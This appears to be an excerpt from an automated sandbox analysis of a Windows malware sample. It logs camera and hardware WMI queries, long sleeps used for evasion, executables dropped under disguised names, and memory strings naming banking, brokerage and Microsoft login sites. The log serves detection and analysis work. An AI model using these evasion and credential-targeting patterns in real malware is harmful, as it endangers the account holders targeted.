                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe Memory allocated: 1620000 memory reserve | memory write watch
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe Memory allocated: 1B280000 memory reserve | memory write watch
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe Memory allocated: F90000 memory reserve | memory write watch
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe Memory allocated: 1A9E0000 memory reserve | memory write watch
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe Code function: 12_2_00007FF848F69089 sldt word ptr [eax]
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe Window / User API: threadDelayed 4540
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe Window / User API: threadDelayed 3981
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe Dropped PE file which has not been started: C:\Users\user\Desktop\rZIMgllI.log
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe Dropped PE file which has not been started: C:\Users\user\Desktop\WSdqVQmD.log
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe Dropped PE file which has not been started: C:\Users\user\Desktop\VWqPFTQA.log
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe Dropped PE file which has not been started: C:\Users\user\Desktop\mmqNDpWU.log
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe Dropped PE file which has not been started: C:\Users\user\Desktop\YQFyrQBy.log
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe Dropped PE file which has not been started: C:\Users\user\Desktop\aSrhMzGt.log
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe Dropped PE file which has not been started: C:\Users\user\Desktop\qtoWZHQP.log
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe Dropped PE file which has not been started: C:\Users\user\Desktop\RFZqtRqa.log
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe Dropped PE file which has not been started: C:\Users\user\Desktop\VeZikCqF.log
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe Dropped PE file which has not been started: C:\Users\user\Desktop\HAEBtuve.log
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe Dropped PE file which has not been started: C:\Users\user\Desktop\AyILZeLM.log
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe Dropped PE file which has not been started: C:\Users\user\Desktop\sDsEbPBc.log
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe Dropped PE file which has not been started: C:\Users\user\Desktop\DjncgsWF.log
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe Dropped PE file which has not been started: C:\Users\user\Desktop\NcaIHEGQ.log
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ZzoyrgAK.log
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe Dropped PE file which has not been started: C:\Users\user\Desktop\dqepydAD.log
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe Dropped PE file which has not been started: C:\Users\user\Desktop\CNmCQxgq.log
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe Dropped PE file which has not been started: C:\Users\user\Desktop\MjOKfqVp.log
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe Dropped PE file which has not been started: C:\Users\user\Desktop\hgVgFZAw.log
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe Dropped PE file which has not been started: C:\Users\user\Desktop\EgPkCslz.log
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe Dropped PE file which has not been started: C:\Users\user\Desktop\EySSXLrj.log
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe Dropped PE file which has not been started: C:\Users\user\Desktop\fFJfpvVh.log
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe Dropped PE file which has not been started: C:\Users\user\Desktop\PZEBmnVi.log
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe Dropped PE file which has not been started: C:\Users\user\Desktop\tAUMwPQX.log
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe Dropped PE file which has not been started: C:\Users\user\Desktop\rMQELCVZ.log
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe Dropped PE file which has not been started: C:\Users\user\Desktop\kWLWNWBq.log
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe Dropped PE file which has not been started: C:\Users\user\Desktop\DKOKmxvl.log
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe Dropped PE file which has not been started: C:\Users\user\Desktop\BvjTveaH.log
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe TID: 5344 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 4748 Thread sleep time: -30000s >= -30000s
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500 Thread sleep time: -7378697629483816s >= -30000s
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -588500s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -588391s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -588281s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -588172s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -588036s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -587906s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -587790s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -587687s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -587578s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -587469s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -587352s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -587232s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -587125s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -587003s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -586882s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -586766s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -586641s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -586531s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -586422s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -586297s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007CA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_007CA69B
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007DC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_007DC220
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007EB348 FindFirstFileExA,0_2_007EB348
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007DE6A3 VirtualQuery,GetSystemInfo,0_2_007DE6A3
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 30000Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 300000Jump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: 041SLKctM1.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                          Source: 041SLKctM1.12.drBinary or memory string: discord.comVMware20,11696428655f
                          Source: 041SLKctM1.12.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                          Source: 041SLKctM1.12.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                          Source: 041SLKctM1.12.drBinary or memory string: global block list test formVMware20,11696428655
                          Source: 041SLKctM1.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                          Source: 041SLKctM1.12.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                          Source: 041SLKctM1.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                          Source: 041SLKctM1.12.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                          Source: 041SLKctM1.12.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                          Source: 041SLKctM1.12.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                          Source: 041SLKctM1.12.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                          Source: 041SLKctM1.12.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                          Source: 041SLKctM1.12.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                          Source: 041SLKctM1.12.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3503278468.000000001B2BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: 041SLKctM1.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                          Source: 041SLKctM1.12.drBinary or memory string: outlook.office.comVMware20,11696428655s
                          Source: 041SLKctM1.12.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                          Source: 041SLKctM1.12.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                          Source: wscript.exe, 00000002.00000003.2262074930.0000000000DC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+d
                          Source: 041SLKctM1.12.drBinary or memory string: AMC password management pageVMware20,11696428655
                          Source: 041SLKctM1.12.drBinary or memory string: tasks.office.comVMware20,11696428655o
                          Source: 041SLKctM1.12.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                          Source: 041SLKctM1.12.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                          Source: 041SLKctM1.12.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                          Source: 041SLKctM1.12.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                          Source: 041SLKctM1.12.drBinary or memory string: dev.azure.comVMware20,11696428655j
                          Source: 041SLKctM1.12.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
